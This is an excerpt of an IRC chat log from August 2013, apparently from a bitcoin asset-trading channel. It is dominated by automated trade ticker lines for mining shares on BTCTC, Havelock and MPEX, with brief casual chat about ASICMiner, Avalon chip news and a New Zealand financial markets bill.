clearly Aug 28 23:58:45 FUCK burnside Aug 28 23:58:51 is dude retarded Aug 28 23:59:21 how many times do I need to agree to this meaningless disclosure statement Aug 28 23:59:29 Everything new ip address Aug 28 23:59:32 it drives me nuts Aug 28 23:59:50 I was yelling at my computer earlier after agree'ing to it 10 times already Aug 28 23:59:58 http://blockchain.info/block-index/411338/0000000000000020c334379c4642537b5ab82f4a01e09216b438a55d90733d5e Aug 29 00:00:01 Bitcoin Block #254642 Aug 29 00:01:00 I think AM usually gives back the fees Aug 29 00:01:03 [BTCTC] [BASIC-MINING] 14 @ 0.1911 = 2.6754 BTC [-] Aug 29 00:01:05 [BTCTC] [BASIC-MINING] 1 @ 0.191 BTC [-] Aug 29 00:01:05 (when it's a mistake) Aug 29 00:01:06 [BTCTC] [BASIC-MINING] 15 @ 0.19 = 2.85 BTC [-] Aug 29 00:01:28 wat Aug 29 00:01:51 how high do you need to be to accidently pay a 200 coin fee Aug 29 00:01:59 "Friedcat - if you are watching, can you give us an update tomorrow with the number of blades sold at the new prices today?" Aug 29 00:02:06 "Are the proceeds from this new blade sale going to be reserved to help deploy gen 2 or will they be included in next week's dividends?" Aug 29 00:02:09 these people.... Aug 29 00:02:28 seems like a lucid question Aug 29 00:02:35 [BTCTC] [LABCOIN] 1 @ 0.003199 BTC [+] Aug 29 00:02:56 to me it sounds like "can you tell me (and everyone else) if i should sell or buy?" Aug 29 00:03:39 I prayed to the hashing gods this morning, Hex, Binary, Crypto and Algo that AM would find a block with a large transaction fee- Aug 29 00:03:46 so really it is mine Aug 29 00:04:02 makes sense Aug 29 00:04:06 the lord giveth Aug 29 00:04:38 more sense than the forum retards eh Aug 29 00:07:45 Well, I know they sold at least 10 Aug 29 00:08:13 nice dump and pump on labcoin Aug 29 00:08:59 [BTCTC] [DMS.SELLING] 10 @ 0.0123 = 0.123 BTC [-] Aug 29 00:10:13 [BTCTC] [DMS.PURCHASE] 20 @ 0.01598 = 0.3196 BTC [+] Aug 29 00:10:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [+] Aug 29 00:10:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02739 BTC [+] Aug 29 00:10:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0274 BTC [+] Aug 29 00:10:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Aug 29 00:10:45 [BTCTC] [BASIC-MINING] 1 @ 0.1824 BTC [-] Aug 29 00:11:19 [BTCTC] [DMS.PURCHASE] 900 @ 0.01598 = 14.382 BTC [+] Aug 29 00:12:38 [BTCTC] [LABCOIN] 60 @ 0.003185 = 0.1911 BTC [-] Aug 29 00:16:43 [HAVELOCK] [XBOND] 500 @ 0.001184 = 0.592 BTC [-] Aug 29 00:17:31 [HAVELOCK] [XBOND] 2 @ 0.001184 = 0.0024 BTC [-] Aug 29 00:18:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Aug 29 00:29:16 [MPEX] [S.MPOE] 7366 @ 0.00087576 = 6.4508 BTC [+] Aug 29 00:29:19 [MPEX] [S.MPOE] 7380 @ 0.00087775 = 6.4778 BTC [+] Aug 29 00:29:36 [MPEX] [S.MPOE] 6000 @ 0.00087779 = 5.2667 BTC [+] Aug 29 00:29:38 [MPEX] [S.MPOE] 9154 @ 0.00087817 = 8.0388 BTC [+] Aug 29 00:30:44 [BTCTC] [HOSTED-MINING] 530 @ 0.00264 = 1.3992 BTC [-] Aug 29 00:32:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Aug 29 00:33:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Aug 29 00:34:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.02749 = 0.055 BTC [+] Aug 29 00:35:02 [HAVELOCK] [XBOND] 108 @ 0.001184 = 0.1279 BTC [-] Aug 29 00:35:44 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001 = 0.003 BTC [+] Aug 29 00:38:41 [MPEX] [S.MPOE] 3700 @ 0.00087339 = 3.2315 BTC [-] Aug 29 00:38:56 [BTCTC] [BITVPS] 1 @ 0.002403 BTC [-] Aug 29 00:39:14 [BTCTC] [ASICMINER-PT] 1 @ 2.66 BTC [+] Aug 29 00:39:50 [BTCTC] [ASICMINER-PT] 1 @ 2.66 BTC [+] Aug 29 00:39:51 [BTCTC] [ASICMINER-PT] 1 @ 2.66 BTC [+] Aug 29 00:39:53 [BTCTC] [ASICMINER-PT] 5 @ 2.64 = 13.2 BTC [-] Aug 29 00:39:54 [BTCTC] [ASICMINER-PT] 3 @ 2.625 = 7.875 BTC [-] Aug 29 00:39:55 [BTCTC] [ASICMINER-PT] 1 @ 2.624 BTC [-] Aug 29 00:39:56 [BTCTC] [ASICMINER-PT] 1 @ 2.618 BTC [-] Aug 29 00:39:57 [BTCTC] [ASICMINER-PT] 2 @ 2.617 = 5.234 BTC [-] Aug 29 00:40:38 [BTCTC] [ACTIVEMINING] 4 @ 0.005149 = 0.0206 BTC [+] Aug 29 00:41:33 [BTCTC] [HOSTED-MINING] 193 @ 0.002798 = 0.54 BTC [+] Aug 29 00:41:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Aug 29 00:43:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Aug 29 00:47:31 [MPEX] [S.MPOE] 2646 @ 0.00087817 = 2.3236 BTC [+] Aug 29 00:47:33 [MPEX] [S.MPOE] 11604 @ 0.00087849 = 10.194 BTC [+] Aug 29 00:49:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02777 BTC [+] Aug 29 00:50:43 [BTCTC] [LABCOIN] 5 @ 0.003184 = 0.0159 BTC [-] Aug 29 00:52:26 [BTCTC] [ACTIVEMINING] 70 @ 0.005229 = 0.366 BTC [+] Aug 29 00:52:51 [BTCTC] [ASICMINER-PT] 1 @ 2.739 BTC [+] Aug 29 00:54:25 [BTCTC] [KENILWORTH] 6 @ 0.0018 = 0.0108 BTC [+] Aug 29 00:55:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02775 BTC [-] Aug 29 00:57:58 [MPEX] [S.MPOE] 2690 @ 0.00087339 = 2.3494 BTC [-] Aug 29 00:58:00 [MPEX] [S.MPOE] 12563 @ 0.0008728 = 10.965 BTC [-] Aug 29 00:58:06 [MPEX] [S.MPOE] 347 @ 0.00087081 = 0.3022 BTC [-] Aug 29 00:59:30 [HAVELOCK] [XBOND] 1 @ 0.001184 BTC [-] Aug 29 01:00:47 [BTCTC] [BASIC-MINING] 1 @ 0.2091 BTC [+] Aug 29 01:01:46 [HAVELOCK] [AM100] 4 @ 0.026 = 0.104 BTC [+] Aug 29 01:07:01 ThickAsThieves, A Quick question, in the case of havelockinvestments losing all their data, do you haven an up to date local copy of who owns what shares? (AsicMiner PT) Aug 29 01:09:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.02775 = 0.0555 BTC [-] Aug 29 01:12:38 [BTCTC] [DMS.MINING] 11 @ 0.00345 = 0.038 BTC [+] Aug 29 01:16:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.02774 = 0.111 BTC [-] Aug 29 01:18:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.02773 BTC [-] Aug 29 01:21:24 [BTCTC] [BASIC-MINING] 7 @ 0.207 = 1.449 BTC [-] Aug 29 01:23:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02773 BTC [-] Aug 29 01:28:06 [MPEX] [S.MPOE] 2300 @ 0.00087363 = 2.0093 BTC [+] Aug 29 01:28:07 [MPEX] [S.MPOE] 2300 @ 0.00087363 = 2.0093 BTC [+] Aug 29 01:28:57 "Then the story repeated itself with the chips. Chips were double-sold to prepaid customers and then sold to unknown third party. Aug 29 01:28:59 There were 135 boxes reported containing up to 15.000 chips each sent to Hong Kong and disappeared. Aug 29 01:28:59 Some of missing chips has showed up on alibaba and taobao sites for auctioning." Aug 29 01:31:27 Avalon? Aug 29 01:31:50 "I am tired of this toxic community malformed by greed." Aug 29 01:31:52 lol Aug 29 01:32:08 https://bitcointalk.org/index.php?topic=269950.1620 Aug 29 01:32:14 Incoming Avalon News 8/9/2013 Aug 29 01:32:52 [HAVELOCK] [XBOND] 1379 @ 0.001184 = 1.6327 BTC [-] Aug 29 01:32:55 [HAVELOCK] [XBOND] 890 @ 0.001185 = 1.0547 BTC [+] Aug 29 01:32:57 [HAVELOCK] [XBOND] 2280 @ 0.001189 = 2.7109 BTC [+] Aug 29 01:32:59 [HAVELOCK] [XBOND] 2000 @ 0.001195 = 2.39 BTC [+] Aug 29 01:33:01 [HAVELOCK] [XBOND] 993 @ 0.0012 = 1.1916 BTC [+] Aug 29 01:34:59 http://www.fma.govt.nz/keep-updated/newsroom/releases-from-the-minister-of-commerce/2013/financial-markets-conduct-bill-passes-third-reading Aug 29 01:35:01 Financial Markets Conduct Bill passes third reading | Financial Markets Authority Aug 29 01:35:26 .nz registered play exchanges appearing in 3.. 2.. Aug 29 01:35:50 Key changes in the Bill include: Aug 29 01:35:52 new forms of capital-raising, such as peer-to-peer lending and crowd-funding Aug 29 01:36:04 a new system to regulate securities exchanges such as the stock market, including allowing for new low cost exchanges to make capital-raising easier and cheaper. Aug 29 01:36:27 [BTCTC] [LABCOIN] 3 @ 0.003082 = 0.0092 BTC [-] Aug 29 01:36:29 [BTCTC] [LABCOIN] 8 @ 0.003081 = 0.0246 BTC [-] Aug 29 01:36:30 [BTCTC] [LABCOIN] 4 @ 0.00308 = 0.0123 BTC [-] Aug 29 01:37:55 [BTCTC] [LABCOIN] 4 @ 0.003068 = 0.0123 BTC [-] Aug 29 01:37:57 [BTCTC] [LABCOIN] 17 @ 0.003067 = 0.0521 BTC [-] Aug 29 01:37:58 [BTCTC] [LABCOIN] 152 @ 0.003063 = 0.4656 BTC [-] Aug 29 01:37:59 [BTCTC] [LABCOIN] 38 @ 0.003062 = 0.1164 BTC [-] Aug 29 01:39:10 [BTCTC] [ASICMINER-PT] 2 @ 2.739 = 5.478 BTC [+] Aug 29 01:39:11 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] Aug 29 01:40:11 ;;calc 0.00345 + .0126 Aug 29 01:40:12 0.01605 Aug 29 01:40:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.02776 = 0.0833 BTC [+] Aug 29 01:40:50 [BTCTC] [ACTIVEMINING] 1 @ 0.00506 BTC [-] Aug 29 01:41:58 [BTCTC] [DMS.MINING] 7 @ 0.00345 = 0.0242 BTC [+] Aug 29 01:41:59 [BTCTC] [DMS.MINING] 209 @ 0.00345 = 0.7211 BTC [+] Aug 29 01:45:33 [BTCTC] [ACTIVEMINING] 4 @ 0.005069 = 0.0203 BTC [+] Aug 29 01:45:37 [BTCTC] [HOSTED-MINING] 37 @ 0.00264 = 0.0977 BTC [-] Aug 29 01:51:49 [BTCTC] [PAJKA.BOND] 1 @ 0.019 BTC [+] Aug 29 01:52:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.02729 = 0.0546 BTC [-] Aug 29 01:52:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02729 BTC [-] Aug 29 01:53:10 [BTCTC] [ACTIVEMINING] 2 @ 0.00505 = 0.0101 BTC [-] Aug 29 01:53:27 [BTCTC] [LABCOIN] 1 @ 0.003179 BTC [+] Aug 29 01:58:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02729 BTC [-] Aug 29 01:58:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0273 BTC [+] Aug 29 02:00:18 [BTCTC] [LABCOIN] 20 @ 0.003177 = 0.0635 BTC [-] Aug 29 02:00:19 [BTCTC] [LABCOIN] 20 @ 0.003178 = 0.0636 BTC [+] Aug 29 02:01:12 [HAVELOCK] [AM100] 5 @ 0.026 = 0.13 BTC [+] Aug 29 02:01:40 [HAVELOCK] [AM100] 6 @ 0.0261 = 0.1566 BTC [+] Aug 29 02:04:38 [BTCTC] [DMS.PURCHASE] 2 @ 0.01598 = 0.032 BTC [+] Aug 29 02:05:42 http://www.dailymail.co.uk/news/article-2403509/Twerking-selfie-bitcoin-added-Oxford-English-Dictionary.html Aug 29 02:05:47 'Twerking,' 'selfie' and 'bitcoin' added to Oxford English Dictionary | Mail Online Aug 29 02:06:28 [BTCTC] [DMS.MINING] 72 @ 0.00345 = 0.2484 BTC [+] Aug 29 02:08:44 such regal company Aug 29 02:09:22 [BTCTC] [LABCOIN] 60 @ 0.003178 = 0.1907 BTC [+] Aug 29 02:09:23 [BTCTC] [LABCOIN] 354 @ 0.003088 = 1.0932 BTC [-] Aug 29 02:09:25 [BTCTC] [LABCOIN] 88 @ 0.003086 = 0.2716 BTC [-] Aug 29 02:09:25 [BTCTC] [LABCOIN] 16 @ 0.003073 = 0.0492 BTC [-] Aug 29 02:09:26 [BTCTC] [LABCOIN] 20 @ 0.003072 = 0.0614 BTC [-] Aug 29 02:09:27 [BTCTC] [LABCOIN] 483 @ 0.00307 = 1.4828 BTC [-] Aug 29 02:09:28 [BTCTC] [LABCOIN] 2000 @ 0.00306 = 6.12 BTC [-] Aug 29 02:09:30 [BTCTC] [LABCOIN] 2000 @ 0.003058 = 6.116 BTC [-] Aug 29 02:09:31 [BTCTC] [LABCOIN] 10 @ 0.003051 = 0.0305 BTC [-] Aug 29 02:09:32 [BTCTC] [LABCOIN] 1 @ 0.00305 BTC [-] Aug 29 02:09:33 [BTCTC] [LABCOIN] 71 @ 0.003048 = 0.2164 BTC [-] Aug 29 02:09:34 [BTCTC] [LABCOIN] 150 @ 0.003046 = 0.4569 BTC [-] Aug 29 02:09:35 [BTCTC] [LABCOIN] 170 @ 0.003045 = 0.5177 BTC [-] Aug 29 02:09:35 [BTCTC] [LABCOIN] 97 @ 0.003045 = 0.2954 BTC [-] Aug 29 02:09:36 [BTCTC] [LABCOIN] 100 @ 0.003041 = 0.3041 BTC [-] Aug 29 02:09:37 [BTCTC] [LABCOIN] 5000 @ 0.003036 = 15.18 BTC [-] Aug 29 02:09:38 [BTCTC] [LABCOIN] 100 @ 0.003022 = 0.3022 BTC [-] Aug 29 02:09:40 [BTCTC] [LABCOIN] 100 @ 0.00301 = 0.301 BTC [-] Aug 29 02:09:41 [BTCTC] [LABCOIN] 1000 @ 0.003008 = 3.008 BTC [-] Aug 29 02:09:42 [BTCTC] [LABCOIN] 1500 @ 0.003006 = 4.509 BTC [-] Aug 29 02:09:43 [BTCTC] [LABCOIN] 1300 @ 0.003006 = 3.9078 BTC [-] Aug 29 02:09:44 [BTCTC] [LABCOIN] 300 @ 0.003005 = 0.9015 BTC [-] Aug 29 02:09:45 [BTCTC] [LABCOIN] 10 @ 0.003001 = 0.03 BTC [-] Aug 29 02:09:46 [BTCTC] [LABCOIN] 400 @ 0.003 = 1.2 BTC [-] Aug 29 02:09:46 [BTCTC] [LABCOIN] 14222 @ 0.003 = 42.666 BTC [-] Aug 29 02:09:47 [BTCTC] [LABCOIN] 3320 @ 0.003 = 9.96 BTC [-] Aug 29 02:09:48 [BTCTC] [LABCOIN] 1 @ 0.003 BTC [-] Aug 29 02:09:49 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [-] Aug 29 02:09:50 [BTCTC] [LABCOIN] 60 @ 0.003 = 0.18 BTC [-] Aug 29 02:11:40 [BTCTC] [DMS.MINING] 150 @ 0.0035 = 0.525 BTC [+] Aug 29 02:14:41 [BTCTC] [DMS.SELLING] 1 @ 0.0123 BTC [-] Aug 29 02:14:44 [BTCTC] [DMS.MINING] 42 @ 0.003595 = 0.151 BTC [+] Aug 29 02:16:55 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 02:17:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0273 BTC [+] Aug 29 02:17:56 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0009899 = 0.0059 BTC [-] Aug 29 02:18:58 [BTCTC] [LABCOIN] 4 @ 0.003179 = 0.0127 BTC [+] Aug 29 02:20:43 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] Aug 29 02:20:44 [MPEX] [S.MPOE] 11531 @ 0.00087742 = 10.1175 BTC [+] Aug 29 02:20:57 [HAVELOCK] [AM100] 6 @ 0.02501 = 0.1501 BTC [-] Aug 29 02:21:36 [HAVELOCK] [XBOND] 2 @ 0.0012425 = 0.0025 BTC [+] Aug 29 02:21:54 [BTCTC] [ASICMINER-PT] 3 @ 2.7 = 8.1 BTC [-] Aug 29 02:22:44 [HAVELOCK] [AM100] 8 @ 0.025 = 0.2 BTC [-] Aug 29 02:24:14 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 02:25:09 [BTCTC] [BITVPS] 1 @ 0.002889 BTC [+] Aug 29 02:25:10 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 02:26:20 [HAVELOCK] [AM100] 2 @ 0.025 = 0.05 BTC [-] Aug 29 02:28:00 [MPEX] [S.MPOE] 2796 @ 0.00087849 = 2.4563 BTC [+] Aug 29 02:28:02 [MPEX] [S.MPOE] 4250 @ 0.00087951 = 3.7379 BTC [+] Aug 29 02:29:10 [BTCTC] [LABCOIN] 2 @ 0.003176 = 0.0064 BTC [-] Aug 29 02:29:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.0273 = 0.1365 BTC [+] Aug 29 02:31:20 [BTCTC] [LABCOIN] 10 @ 0.003011 = 0.0301 BTC [-] Aug 29 02:31:34 [BTCTC] [LABCOIN] 88 @ 0.003011 = 0.265 BTC [-] Aug 29 02:32:02 [BTCTC] [LABCOIN] 20 @ 0.00301 = 0.0602 BTC [-] Aug 29 02:32:14 [BTCTC] [LABCOIN] 21 @ 0.00301 = 0.0632 BTC [-] Aug 29 02:32:55 [BTCTC] [ACTIVEMINING] 4 @ 0.004974 = 0.0199 BTC [-] Aug 29 02:32:57 [BTCTC] [ACTIVEMINING] 50 @ 0.004876 = 0.2438 BTC [-] Aug 29 02:32:58 [BTCTC] [ACTIVEMINING] 1000 @ 0.004875 = 4.875 BTC [-] Aug 29 02:33:56 [HAVELOCK] [AM100] 6 @ 0.02609 = 0.1565 BTC [+] Aug 29 02:33:59 [BTCTC] [LABCOIN] 2861 @ 0.00301 = 8.6116 BTC [-] Aug 29 02:34:00 [BTCTC] [LABCOIN] 2139 @ 0.003011 = 6.4405 BTC [+] Aug 29 02:34:00 [BTCTC] [LABCOIN] 479 @ 0.003 = 1.437 BTC [-] Aug 29 02:34:02 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [-] Aug 29 02:35:37 [BTCTC] [LABCOIN] 200 @ 0.002971 = 0.5942 BTC [-] Aug 29 02:37:25 [HAVELOCK] [AM100] 5 @ 0.02609 = 0.1305 BTC [+] Aug 29 02:37:32 [BTCTC] [LABCOIN] 171 @ 0.002997 = 0.5125 BTC [+] Aug 29 02:37:33 [BTCTC] [LABCOIN] 79 @ 0.00301 = 0.2378 BTC [+] Aug 29 02:38:35 [HAVELOCK] [AM100] 7 @ 0.0261 = 0.1827 BTC [+] Aug 29 02:38:44 [BTCTC] [LABCOIN] 200 @ 0.002962 = 0.5924 BTC [-] Aug 29 02:38:45 [BTCTC] [LABCOIN] 1 @ 0.0029 BTC [-] Aug 29 02:38:47 [BTCTC] [LABCOIN] 75 @ 0.002871 = 0.2153 BTC [-] Aug 29 02:38:48 [BTCTC] [LABCOIN] 301 @ 0.00287 = 0.8639 BTC [-] Aug 29 02:38:49 [BTCTC] [LABCOIN] 2912 @ 0.002861 = 8.3312 BTC [-] Aug 29 02:38:49 [BTCTC] [LABCOIN] 3000 @ 0.00286 = 8.58 BTC [-] Aug 29 02:38:50 [BTCTC] [LABCOIN] 9000 @ 0.002858 = 25.722 BTC [-] Aug 29 02:38:52 [BTCTC] [LABCOIN] 100 @ 0.002831 = 0.2831 BTC [-] Aug 29 02:38:53 [BTCTC] [LABCOIN] 506 @ 0.002826 = 1.43 BTC [-] Aug 29 02:38:54 [BTCTC] [LABCOIN] 34 @ 0.0028 = 0.0952 BTC [-] Aug 29 02:38:55 [BTCTC] [LABCOIN] 2270 @ 0.0028 = 6.356 BTC [-] Aug 29 02:38:56 [BTCTC] [LABCOIN] 1 @ 0.0028 BTC [-] Aug 29 02:38:57 [BTCTC] [LABCOIN] 235 @ 0.0028 = 0.658 BTC [-] Aug 29 02:38:58 [BTCTC] [LABCOIN] 5441 @ 0.002751 = 14.9682 BTC [-] Aug 29 02:38:59 [BTCTC] [LABCOIN] 924 @ 0.00275 = 2.541 BTC [-] Aug 29 02:39:52 [BTCTC] [LABCOIN] 1968 @ 0.00275 = 5.412 BTC [-] Aug 29 02:39:53 [BTCTC] [LABCOIN] 50 @ 0.002731 = 0.1366 BTC [-] Aug 29 02:39:55 [BTCTC] [LABCOIN] 150 @ 0.002705 = 0.4058 BTC [-] Aug 29 02:39:56 [BTCTC] [LABCOIN] 332 @ 0.0027 = 0.8964 BTC [-] Aug 29 02:41:30 [BTCTC] [ACTIVEMINING] 30 @ 0.00486 = 0.1458 BTC [-] Aug 29 02:41:31 [BTCTC] [ACTIVEMINING] 130 @ 0.004845 = 0.6299 BTC [-] Aug 29 02:41:32 [BTCTC] [ACTIVEMINING] 325 @ 0.00484 = 1.573 BTC [-] Aug 29 02:41:34 [BTCTC] [ACTIVEMINING] 251 @ 0.004823 = 1.2106 BTC [-] Aug 29 02:41:35 [BTCTC] [ACTIVEMINING] 4 @ 0.004822 = 0.0193 BTC [-] Aug 29 02:41:36 [BTCTC] [ACTIVEMINING] 760 @ 0.00482 = 3.6632 BTC [-] Aug 29 02:42:13 [BTCTC] [HOSTED-MINING] 100 @ 0.002798 = 0.2798 BTC [+] Aug 29 02:42:33 [BTCTC] [LABCOIN] 199 @ 0.002702 = 0.5377 BTC [+] Aug 29 02:42:34 [BTCTC] [LABCOIN] 801 @ 0.0027 = 2.1627 BTC [-] Aug 29 02:42:49 [BTCTC] [ACTIVEMINING] 14 @ 0.004821 = 0.0675 BTC [+] Aug 29 02:42:50 [BTCTC] [ACTIVEMINING] 240 @ 0.00482 = 1.1568 BTC [-] Aug 29 02:42:52 [BTCTC] [ACTIVEMINING] 140 @ 0.0048 = 0.672 BTC [-] Aug 29 02:42:53 [BTCTC] [ACTIVEMINING] 606 @ 0.004795 = 2.9058 BTC [-] Aug 29 02:43:07 [MPEX] [S.MPOE] 154 @ 0.0008806 = 0.1356 BTC [+] Aug 29 02:43:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0267 BTC [-] Aug 29 02:43:42 [BTCTC] [LABCOIN] 168 @ 0.002702 = 0.4539 BTC [+] Aug 29 02:43:43 [BTCTC] [LABCOIN] 2517 @ 0.0027 = 6.7959 BTC [-] Aug 29 02:43:45 [BTCTC] [LABCOIN] 5 @ 0.0027 = 0.0135 BTC [-] Aug 29 02:43:45 [BTCTC] [LABCOIN] 310 @ 0.0027 = 0.837 BTC [-] Aug 29 02:47:30 [BTCTC] [ACTIVEMINING] 1000 @ 0.004793 = 4.793 BTC [-] Aug 29 02:50:29 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] Aug 29 02:53:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0267 = 0.0534 BTC [-] Aug 29 02:54:01 [BTCTC] [ACTIVEMINING] 1000 @ 0.0047 = 4.7 BTC [-] Aug 29 02:54:03 [BTCTC] [ACTIVEMINING] 20 @ 0.0047 = 0.094 BTC [-] Aug 29 02:54:04 [BTCTC] [ACTIVEMINING] 1000 @ 0.00461 = 4.61 BTC [-] Aug 29 02:54:05 [BTCTC] [ACTIVEMINING] 2439 @ 0.004603 = 11.2267 BTC [-] Aug 29 02:58:29 [MPEX] [S.MPOE] 11500 @ 0.0008792 = 10.1108 BTC [-] Aug 29 02:58:34 [BTCTC] [LABCOIN] 141 @ 0.002727 = 0.3845 BTC [+] Aug 29 02:58:35 [BTCTC] [LABCOIN] 300 @ 0.002725 = 0.8175 BTC [-] Aug 29 02:58:37 [BTCTC] [LABCOIN] 144 @ 0.002725 = 0.3924 BTC [-] Aug 29 02:58:38 [BTCTC] [LABCOIN] 444 @ 0.002701 = 1.1992 BTC [-] Aug 29 02:58:39 [BTCTC] [LABCOIN] 60 @ 0.0027 = 0.162 BTC [-] Aug 29 02:58:39 [BTCTC] [LABCOIN] 444 @ 0.002676 = 1.1881 BTC [-] Aug 29 02:58:40 [BTCTC] [LABCOIN] 80 @ 0.002675 = 0.214 BTC [-] Aug 29 02:58:42 [BTCTC] [LABCOIN] 100 @ 0.002671 = 0.2671 BTC [-] Aug 29 02:58:43 [BTCTC] [LABCOIN] 100 @ 0.00266 = 0.266 BTC [-] Aug 29 02:58:44 [BTCTC] [LABCOIN] 1000 @ 0.002656 = 2.656 BTC [-] Aug 29 02:59:33 [BTCTC] [LABCOIN] 5441 @ 0.002987 = 16.2523 BTC [+] Aug 29 02:59:35 [BTCTC] [LABCOIN] 284 @ 0.002988 = 0.8486 BTC [+] Aug 29 02:59:36 [BTCTC] [LABCOIN] 4275 @ 0.002989 = 12.778 BTC [+] Aug 29 03:01:39 [BTCTC] [ACTIVEMINING] 50 @ 0.004968 = 0.2484 BTC [+] Aug 29 03:02:30 [BTCTC] [LABCOIN] 1 @ 0.002982 BTC [-] Aug 29 03:02:59 [BTCTC] [TAT.ASICMINER] 27 @ 0.0267 = 0.7209 BTC [-] Aug 29 03:16:07 [MPEX] [S.MPOE] 7735 @ 0.00087742 = 6.7868 BTC [-] Aug 29 03:16:09 [MPEX] [S.MPOE] 9387 @ 0.000877 = 8.2324 BTC [-] Aug 29 03:16:12 [MPEX] [S.MPOE] 1650 @ 0.00087474 = 1.4433 BTC [-] Aug 29 03:16:19 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 03:21:50 [BTCTC] [BFMINES] 1 @ 0.0024 BTC [-] Aug 29 03:21:50 [BTCTC] [LABCOIN] 601 @ 0.002693 = 1.6185 BTC [-] Aug 29 03:21:52 [BTCTC] [BFMINES] 1 @ 0.002 BTC [-] Aug 29 03:21:54 [BTCTC] [BFMINES] 1 @ 0.001133 BTC [-] Aug 29 03:21:55 [BTCTC] [BFMINES] 1 @ 0.001102 BTC [-] Aug 29 03:28:54 [BTCTC] [BASIC-MINING] 5 @ 0.1963 = 0.9815 BTC [-] Aug 29 03:29:10 [BTCTC] [MININGCO.ETF] 1 @ 0.103 BTC [-] Aug 29 03:29:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0273 BTC [+] Aug 29 03:31:32 [BTCTC] [LABCOIN] 1 @ 0.002982 BTC [+] Aug 29 03:33:04 [BTCTC] [LABCOIN] 1 @ 0.002982 BTC [+] Aug 29 03:33:05 [BTCTC] [LABCOIN] 649 @ 0.00299 = 1.9405 BTC [+] Aug 29 03:33:08 [MPEX] [S.MPOE] 4371 @ 0.00087288 = 3.8154 BTC [-] Aug 29 03:33:10 [MPEX] [S.MPOE] 5532 @ 0.00087081 = 4.8173 BTC [-] Aug 29 03:33:33 [BTCTC] [LABCOIN] 40 @ 0.00299 = 0.1196 BTC [+] Aug 29 03:34:52 [BTCTC] [DMS.MINING] 10 @ 0.0035 = 0.035 BTC [-] Aug 29 03:36:24 [BTCTC] [TAT.ASICMINER] 62 @ 0.0273 = 1.6926 BTC [+] Aug 29 03:42:35 [HAVELOCK] [AM100] 7 @ 0.0248 = 0.1736 BTC [-] Aug 29 03:42:37 [HAVELOCK] [AM100] 2 @ 0.02475 = 0.0495 BTC [-] Aug 29 03:42:39 [HAVELOCK] [AM100] 25 @ 0.0247 = 0.6175 BTC [-] Aug 29 03:42:41 [HAVELOCK] [AM100] 27 @ 0.0246 = 0.6642 BTC [-] Aug 29 03:46:37 [BTCTC] [TAT.ASICMINER] 18 @ 0.0272 = 0.4896 BTC [-] Aug 29 03:47:26 [BTCTC] [BFMINES] 1 @ 0.001235 BTC [+] Aug 29 03:53:50 [BTCTC] [ASICMINER-PT] 2 @ 2.666 = 5.332 BTC [-] Aug 29 03:53:51 [BTCTC] [ASICMINER-PT] 4 @ 2.666 = 10.664 BTC [-] Aug 29 03:59:31 mircea_popescu ping Aug 29 03:59:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.0273 = 0.2184 BTC [+] Aug 29 04:03:23 [MPEX] [S.MPOE] 6427 @ 0.00087281 = 5.6095 BTC [+] Aug 29 04:04:19 [BTCTC] [DMS.MINING] 247 @ 0.003589 = 0.8865 BTC [+] Aug 29 04:04:20 [BTCTC] [DMS.MINING] 300 @ 0.00359 = 1.077 BTC [+] Aug 29 04:04:22 [BTCTC] [DMS.MINING] 291 @ 0.003595 = 1.0461 BTC [+] Aug 29 04:04:23 [BTCTC] [DMS.MINING] 249 @ 0.003596 = 0.8954 BTC [+] Aug 29 04:04:24 [BTCTC] [DMS.MINING] 291 @ 0.003596 = 1.0464 BTC [+] Aug 29 04:05:56 [BTCTC] [DMS.MINING] 235 @ 0.003598 = 0.8455 BTC [+] Aug 29 04:06:33 [BTCTC] [ASICMINER-PT] 1 @ 2.718 BTC [+] Aug 29 04:07:42 [BTCTC] [TAT.ASICMINER] 85 @ 0.0273 = 2.3205 BTC [+] Aug 29 04:09:08 [BTCTC] [ACTIVEMINING] 1 @ 0.004915 BTC [-] Aug 29 04:11:56 [BTCTC] [LABCOIN] 1 @ 0.002976 BTC [-] Aug 29 04:13:12 [BTCTC] [LABCOIN] 1100 @ 0.002741 = 3.0151 BTC [-] Aug 29 04:16:01 [BTCTC] [DMS.PURCHASE] 127 @ 0.01598 = 2.0295 BTC [+] Aug 29 04:16:03 [MPEX] [S.MPOE] 1578 @ 0.0008738 = 1.3789 BTC [+] Aug 29 